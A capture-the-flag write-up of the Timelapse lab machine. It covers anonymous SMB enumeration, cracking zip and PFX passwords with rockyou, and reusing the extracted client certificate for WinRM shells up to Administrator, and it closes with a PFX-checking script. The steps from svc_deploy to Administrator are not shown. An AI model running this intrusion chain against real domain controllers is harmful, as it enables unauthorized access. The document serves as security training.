# Machine Timelapse

----

```bash
nmap -Pn -sC -sV 10.10.11.152
```

```nmap
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-30 15:48 EDT
Nmap scan report for 10.10.11.152
Host is up (0.048s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-05-31 03:48:47Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 7h59m56s
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required
| smb2-time:
|   date: 2022-05-31T03:48:54
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 57.80 seconds
```

Reading the scan: DNS, Kerberos, LDAP/LDAPS, the global catalog ports (3268/3269) and kpasswd (464) together mean DC01 is a domain controller for `timelapse.htb` (the trailing `0.` on the domain is an artifact of how nmap decodes the LDAP response, not part of the name). Two details matter later: SMB signing is required, so SMB relay is off the table, and the DC clock is about 8 hours ahead of the attacking box (`clock-skew: 7h59m56s`). Kerberos rejects requests outside a 5 minute window, so any Kerberos-based tooling needs the local clock synced to DC01 first (for example `ntpdate 10.10.11.152`).

### nmblookup -A 10.10.11.152

```bash
Looking up status of 10.10.11.152
No reply from 10.10.11.152
```

## enum4linux -a 10.10.11.152

```bash
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon May 30 15:58:32 2022

 =========================================( Target Information )=========================================

Target ........... 10.10.11.152
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

 ============================( Enumerating Workgroup/Domain on 10.10.11.152 )============================

[E] Can't find workgroup/domain

 ================================( Nbtstat Information for 10.10.11.152 )================================

Looking up status of 10.10.11.152
No reply from 10.10.11.152

 ===================================( Session Check on 10.10.11.152 )===================================

[+] Server 10.10.11.152 allows sessions using username '', password ''

 ================================( Getting domain SID for 10.10.11.152 )================================

Domain Name: TIMELAPSE
Domain Sid: S-1-5-21-671920749-559770252-3318990721

[+] Host is part of a domain (not a workgroup)

 ===================================( OS information on 10.10.11.152 )===================================

[E] Can't get OS info with smbclient

[+] Got OS info for 10.10.11.152 from srvinfo:
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED

 =======================================( Users on 10.10.11.152 )=======================================

[E] Couldn't find users using querydispinfo: NT_STATUS_ACCESS_DENIED
[E] Couldn't find users using enumdomusers: NT_STATUS_ACCESS_DENIED

 =================================( Share Enumeration on 10.10.11.152 )=================================

do_connect: Connection to 10.10.11.152 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)

        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available

[+] Attempting to map shares on 10.10.11.152

 ============================( Password Policy Information for 10.10.11.152 )============================

[E] Unexpected error from polenum:

[+] Attaching to 10.10.11.152 using a NULL share
[+] Trying protocol 139/SMB...
[!] Protocol failed: Cannot request session (Called Name:10.10.11.152)
[+] Trying protocol 445/SMB...
[!] Protocol failed: SAMR SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.

[E] Failed to get password policy with rpcclient

 =======================================( Groups on 10.10.11.152 )=======================================

[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:

 ==================( Users on 10.10.11.152 via RID cycling (RIDS: 500-550,1000-1050) )==================

[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED. RID cycling not possible.

 ===============================( Getting printer info for 10.10.11.152 )===============================

do_cmd: Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED

enum4linux complete on Mon May 30 15:59:01 2022
```

The null session is accepted at the SMB layer (and gives up the domain SID), but every RPC pipe behind it (srvsvc, samr, spoolss) answers `NT_STATUS_ACCESS_DENIED`, so anonymous user, password policy and RID-cycling enumeration yields nothing. The share listing failed here against the bare IP; the `smbclient` run below, which passes a NetBIOS name with `-I`, gets the list.

### dig AXFR timelapse.htb0 @10.10.11.152

```bash
; <<>> DiG 9.18.1-1-Debian <<>> AXFR timelapse.htb0 @10.10.11.152
;; global options: +cmd
; Transfer failed.
```

(The zone name copied from the nmap output carries the `0` artifact; the real zone is `timelapse.htb`.)

### smbclient -L \\timelapse -I 10.10.11.152 -N

```bash
        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share
        Shares          Disk
        SYSVOL          Disk      Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to timelapse failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
```

`Shares` is the only non-default share, and it is readable without credentials.

### smbclient //timelapse/Shares -I 10.10.11.152 -N

```bash
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Mon Oct 25 11:39:15 2021
  ..                                  D        0  Mon Oct 25 11:39:15 2021
  Dev                                 D        0  Mon Oct 25 15:40:06 2021
  HelpDesk                            D        0  Mon Oct 25 11:48:42 2021

                6367231 blocks of size 4096. 2453069 blocks available
```

### fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt winrm_backup.zip

```bash
PASSWORD FOUND!!!!: pw == supremelegacy
```

### pfx2john legacyy_dev_auth.pfx

```bash
big output
```

### john pfx.hash --wordlist=/usr/share/wordlists/rockyou.txt

```bash
Using default input encoding: UTF-8
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 128/128 AVX 4x])
Cost 1 (iteration count) is 2000 for all loaded hashes
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
thuglegacy       (legacyy_dev_auth.pfx)
1g 0:00:01:37 DONE (2022-05-30 17:11) 0.01028g/s 33232p/s 33232c/s 33232C/s thuglife06..thug211
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
```

**Golden Certificate?**

Not really: the x509 dump further down shows Issuer = Subject = `CN = Legacyy`, so this is a self-signed client-authentication certificate for a single account, not a CA key that could mint certificates for arbitrary users.

### Extract the private key and the certificate from the PFX

## Private key

```bash
openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out devauth-privkey.pem -nodes
Enter Import Password:
```

## Certificate

```bash
openssl pkcs12 -in legacyy_dev_auth.pfx -nokeys -out devauth-cert.pem
Enter Import Password:
```

The import password is the one john recovered (`thuglegacy`). With OpenSSL 3.x, PFX bundles that still use the legacy RC2/3DES PBE schemes are rejected unless `-legacy` is added to the `openssl pkcs12` command.

## Eric: did you have this user?
(back later)

```bash
strings legacyy_dev_auth.pfx
```

Most of the output is binary noise; the readable fragments are the certificate fields:

```bash
...
Legacyy0
211025140552Z
311025141552Z0
Legacyy0
...
legacyy@timelapse.htb0
...
```

That is the subject/issuer CN (`Legacyy`), the UTCTime validity window (2021-10-25 14:05:52 to 2031-10-25 14:15:52) and the e-mail `legacyy@timelapse.htb`; the trailing `0` characters are adjacent bytes of the DER encoding, not part of the values.

### User listed in the certificate

```bash
openssl x509 -in devauth-cert.pem -noout -text
```

```bash
Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number:
            1d:99:89:29:8a:cf:11:bb:41:93:a1:cf:f4:4e:12:df
        Signature Algorithm: sha256WithRSAEncryption
        Issuer: CN = Legacyy
        Validity
            Not Before: Oct 25 14:05:52 2021 GMT
            Not After : Oct 25 14:15:52 2031 GMT
        Subject: CN = Legacyy
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
                RSA Public-Key: (2048 bit)
                Modulus:
                    00:a5:56:07:a3:62:16:47:1e:e2:f3:4d:23:ad:61:
                    71:ce:8b:9e:b3:4a:87:2b:f6:89:bc:e7:86:03:bb:
                    fe:aa:1c:16:b8:35:ff:31:14:fe:88:34:d0:4d:95:
```

Issuer and Subject are both `CN = Legacyy`: a self-signed certificate, valid for ten years, that the DC maps to the `legacyy` account for WinRM client-certificate authentication.

### got first flag

## evil-winrm -i 10.10.11.152 -u Legacyy -p '' -c devauth-cert.pem -k devauth.key --ssl

(`devauth.key` is the private key extracted above as `devauth-privkey.pem`; no password is needed because the certificate does the authenticating.)

```bash
Evil-WinRM shell v3.3

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Warning: SSL enabled

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\legacyy\Documents> whoami
timelapse\legacyy
*Evil-WinRM* PS C:\Users\legacyy\Documents> dir


    Directory: C:\Users\legacyy\Documents


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         5/30/2022  11:52 PM         585075 Powerup.ps1


*Evil-WinRM* PS C:\Users\legacyy\Downloads> cd ..
*Evil-WinRM* PS C:\Users\legacyy> cd Desktop
*Evil-WinRM* PS C:\Users\legacyy\Desktop> dir


    Directory: C:\Users\legacyy\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         5/30/2022  11:58 PM         585075 Powerup.ps1
-ar---         5/30/2022   2:44 AM             34 user.txt


*Evil-WinRM* PS C:\Users\legacyy\Desktop>
```

### Not root yet, but one more user

#### evil-winrm -i 10.10.11.152 -u svc_deploy -p '------here password' --ssl

```powershell
Evil-WinRM shell v3.3

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Warning: SSL enabled

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc_deploy\Documents> whoami
timelapse\svc_deploy
```

# Going to bed....

```powershell
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
timelapse\administrator
*Evil-WinRM* PS C:\Users\\Desktop> dir


    Directory: C:\Users\\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-ar---         5/30/2022   2:44 AM             34 root.txt
```
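The PFX handling in these notes (crack the import password, extract the key and the certificate, hand both to evil-winrm) is easy to get subtly wrong: a wrong `-legacy` decision, or a key file that does not belong to the cert, only shows up as an opaque WinRM failure. The script below is an added example, not part of the original notes, that does the extraction with the same `openssl pkcs12` calls, retries with `-legacy` when OpenSSL 3.x refuses the bundle, then checks that the extracted private key really matches the certificate's public key and prints the identity the certificate asserts. File names (`key.pem`, `cert.pem`), the output directory and the argument order are this script's own conventions; nothing here depends on the real `legacyy_dev_auth.pfx`.

```shell
#!/bin/sh
# Added example (not from the original notes): PFX preflight before evil-winrm.
#   sh pfx_preflight.sh legacyy_dev_auth.pfx thuglegacy ./out
# Arguments and file names are assumptions made by this script.
set -u

# pfx_extract <bundle.pfx> <password> <outdir>
# Writes <outdir>/key.pem (unencrypted PKCS#8) and <outdir>/cert.pem (leaf cert only).
# OpenSSL 3.x rejects bundles encrypted with the old RC2/3DES PBE unless the legacy
# provider is loaded, so a failed first attempt is retried with -legacy.
pfx_extract() {
    pfx=$1; pass=$2; out=$3
    mkdir -p "$out" || return 1
    legacy=""
    if ! openssl pkcs12 -in "$pfx" -passin "pass:$pass" -nocerts -nodes \
            -out "$out/key.pem" 2>/dev/null; then
        legacy="-legacy"
        openssl pkcs12 $legacy -in "$pfx" -passin "pass:$pass" -nocerts -nodes \
            -out "$out/key.pem" 2>/dev/null || return 1
    fi
    openssl pkcs12 $legacy -in "$pfx" -passin "pass:$pass" -nokeys -clcerts \
        -out "$out/cert.pem" 2>/dev/null || return 1
}

# pfx_check_pair <key.pem> <cert.pem>
# Succeeds only when the public key derived from the private key is byte-for-byte
# the SubjectPublicKeyInfo embedded in the certificate. Both commands print the
# same PEM "PUBLIC KEY" encoding for the same key, so a plain string compare is enough.
pfx_check_pair() {
    k=$(openssl pkey -in "$1" -pubout 2>/dev/null) || return 1
    c=$(openssl x509 -in "$2" -pubkey -noout 2>/dev/null) || return 1
    [ -n "$k" ] && [ "$k" = "$c" ]
}

# pfx_identity <cert.pem>
# Prints subject, issuer, validity window and any e-mail address the certificate
# carries; compare these with the account you intend to authenticate as.
pfx_identity() {
    openssl x509 -in "$1" -noout -subject -issuer -dates -email
}

# Stand-alone use: extract, verify, then report. Skipped when sourced without args.
if [ $# -eq 3 ]; then
    pfx_extract "$1" "$2" "$3" || { echo "extraction failed (wrong password or unsupported PBE)"; exit 1; }
    pfx_check_pair "$3/key.pem" "$3/cert.pem" || { echo "private key does not match certificate"; exit 1; }
    pfx_identity "$3/cert.pem"
fi
```

`pfx_check_pair` is the step that replaces the guesswork: if it fails, the key or the certificate you are about to pass as `-k` / `-c` came from a different bundle, and no amount of fiddling with evil-winrm flags will help. `pfx_identity` covers the `strings` detour above in one call; the subject CN, validity dates and the e-mail all come out of the parsed certificate rather than out of raw DER fragments.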